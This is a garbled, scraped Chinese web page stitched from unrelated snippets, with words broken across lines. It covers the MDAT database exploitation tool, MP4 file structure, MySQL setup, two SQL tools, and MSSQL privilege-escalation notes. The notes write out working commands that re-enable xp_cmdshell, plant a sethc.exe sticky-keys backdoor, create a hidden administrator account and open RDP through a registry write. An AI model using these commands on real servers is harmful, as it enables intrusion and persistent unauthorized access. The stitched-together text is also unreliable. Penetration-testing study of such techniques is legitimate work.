由于各种数据库攻击利用工具需要各种环境导致使用相当不便,便萌生了开发此工具的想法,将常用的数据库集合在一起并且优化当时工具的一些不足。工具没有神仙技巧,都是网上现成的 POC 集合,更多的是开发时候对 JavaFx 的操控。
Mysql
传统UDF提权自适应版本NTFS创建目录(鸡肋基本没成功过)
Mssql
使用 jTDS 包,支持 Microsoft SQL Server (6.5, 7, 2000, 2005, 2008 and 2012) 数据库版本支持 Sp_OACreate 命令回显(依赖 bulk insert 命令)支持文件浏览功能
Oracle
目前仅支持命令执行功能(初测要 Oracle 版本 <= 10)
PostsgreSql
8.2以下版本使用默认库执行 /lib/x86_64-linux-gnu/libc.so.6 /lib/libc.so.6 /lib64/libc.so.68.2-9.2使用UDF提权(目前程序已编译9.0, 9.1, 9.2)9.3-Latest(默认使用cve-2019-9193提权)
Redis
涉及主从与远程交互暂未写
增加 Mssql CLR 的功能增加全局延时功能Redis数据库查询功能Oracle 文件管理功能Oracle 反弹 Shell 功能
项目地址:
https://github.com/SafeGroceryStore/MDAT(点击阅读原文直接跳转下载地址)
sql综合利用工具(sqltools)
PayloadsAllTheThings(https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/SQL%20Injection/PostgreSQL%20Injection.md)
该项目仅供合法的渗透测试以及爱好者参考学习,请各位遵守《中华人民共和国网络安全法》以及相应地方的法律,禁止使用该项目进行违法操作,否则自行承担相关责任!
M
DAT
一款
用于
数据库
攻击
的
利用
工具
,集合了多种主流的
数据库
类型。由 Ch1ng & j1anFen 共同完成开发。 起因 由于各种
数据库
攻击
利用
工具
需要各种环境导致使用相当不便,便萌生了开发此
工具
的想法,将常用的
数据库
集合在一起并且优化当时
工具
的一些不足。
工具
没有神仙技巧,都是网上现成的 POC
M
DAT
一款
用于
数据库
攻击
的
利用
工具
,集合了多种主流的
数据库
类型。由 Ch1ng & j1anFen 共同完成开发。
MP4文件中的所有数据都装在box(QuickTime中为atom)中,也就是说MP4文件由若干个box组成,每个box有类型和长度,可以将box理解为一个数据对象块。box中可以包含另一个box,这种box称为container box。一个MP4文件首先会有且只有一个“ftyp”类型的box,作为MP4格式的标志并包含关于文件的一些信息;之后会有且只有一个“moov”类型的box(Movie Box),它是一种container box,子box包含了媒体的meta
dat
a信息;MP4文件的媒体数据包含在“m
dat
”类型的box(Midia
Dat
a Box)中,该类型的box也是container box,可以有多个,也可以没有(当媒体数据全部引用其他文件时),媒体数据的结构由meta
dat
a进行描述。
MY
SQL
免安装教程配置
自行百度,好多教程都说修改配置文件,但是百度配置文件,给出答案都不统一,所以,自我体验一点就是其实没有必要去修改配置文件,5.6版本自带my-default.ini,下载安装包之后,直接进行解压,然后配置环境,将bin目录路径添加到环境变量中的path中,以管理员身份运行命令窗体进行安装即可,对于编码集设置,在我们创建
数据库
的时候可以直接指定。
遇到的问题如下:
公众号关注「奇妙的 Linux 世界」设为「星标」,每天带你玩转 Linux !VSCode
SQL
Tools
是一个非常轻量级的
数据库
管理插件,可以在 VSCode 中轻松管理
数据库
连接、查询、
SQL
语句智能提示、书签、查询历史等等,常用的管理功能都有。你可以在 https://vscode-
sql
tools
.mteixeira.dev/ 中查看完整的文档了解更多信息...
##
sql
Tools
使用文档
#### 1.
sql
Tools
介绍
sql
Tools
是数据挖潜项目研发过程中,从大量重复业务代码中抽离出来的前端基于
SQL
进行后台接口配置的配置
工具
,该
工具
极大简化了编写重复的CRUD接口,将研发人员从写重复的业务接口中解放出来。
sql
Tools
配置的接口方便管理,方便修改,支持热部署。
sql
Tools
配置好项目和分组模块,可以支持多个项目并行使用。以下是
sql
Tools
具有的主要特征:
> * 免除后台Java写接口,..
drop procedure sp_addextendedproc
drop procedure sp_oacreate
exec sp_dropextendedproc 'xp_cmdshell'
第二步恢复:
dbcc addextendedproc ("sp_oacreate","odsole70.dll")
dbcc addextendedproc ("xp_cmdshell","xplog70.dll")
2、 原因: 126(找不到指定的模块。)。
修复方法:
dbcc dropextendedproc ("xp_cmdshell")
第二步先删除:
drop procedure sp_addextendedproc
drop procedure sp_oacreate
exec sp_dropextendedproc 'xp_cmdshell'
第三步恢复:
dbcc addextendedproc ("sp_oacreate","odsole70.dll")
dbcc addextendedproc ("xp_cmdshell","xplog70.dll")
直接恢复,不管sp_addextendedproc是不是存在
3、 Error Message:
SQL
Server 阻止了对组件 'xp_cmdshell' 的 过程 'sys.xp_cmdshell' 的访问,因为此组件已作为此服务器安全配置的一部分而被关闭。系统管理员可以通过使用 sp_configure 启用 'xp_cmdshell'。有关启用 'xp_cmdshell' 的详细信息,请参阅
SQL
Server 联机丛书中的 "外围应用配置器"。
修复方法:分离器上执行
EXEC sp_configure 'show advanced options', 1;RECONFIGURE;EXEC sp_configure 'xp_cmdshell', 1;RECONFIGURE;
4、 net
提权
出现 拒绝访问
可以尝试一下net1 user 用户 密码 /add 如果net1也是拒绝访问可以copy一个shfit后门试试执行cmd命令:copy c:\windows\explorer.exe c:\windows\system32\sethc.exe
copy c:\windows\system32\sethc.exe c:\windows\system32\dllcache\sethc.exe
如果提示 复制1文件 哪么证明成功了。连接终端然后按5下shift看看蹦出来了什么。玩咔咔 资源管理器,现在只要手工加个用户就好了。
5、 建号
net user chenyu chenyu$ /add
net localgroup administrators chenyu /add
C:\WINDOWS\system32\dllcache\net1.exe user chenyu chenyu$ /add
C:\WINDOWS\system32\dllcache\net1.exe localgroup administrators chenyu /add
5、 开3389
execmaster.dbo.xp_regwrite'HKEY_LOCAL_MACHINE','SYSTEM\CurrentControlSet\Control\Terminal Server','fDenyTSConnections','REG_DWORD',0;--
在
利用
系统溢出漏洞无果的情况下,可以采用
数据库
进行
提权
,但需要知道
数据库
提权
的前提条件:
服务器开启
数据库
服务及获取到最高权限用户密码。除 Access
数据库
外,其他
数据库
基本都存在数
据库
提权
的可能
数据库
应用
提权
在权限提升中的意义
WEB 或本地环境如何探针
数据库
应用
数据库
提权
权限用户密码收集等方法
目前
数据库
提权
对应的技术及方法等
流程:服务探针-信息收集-
提权
利用
-获取权限
一、UDF
提权
知识点:(基于 MY
SQL
调用命令执行函数)
读取网站
数据库
配置文件(了解其命名规则及查找技巧).
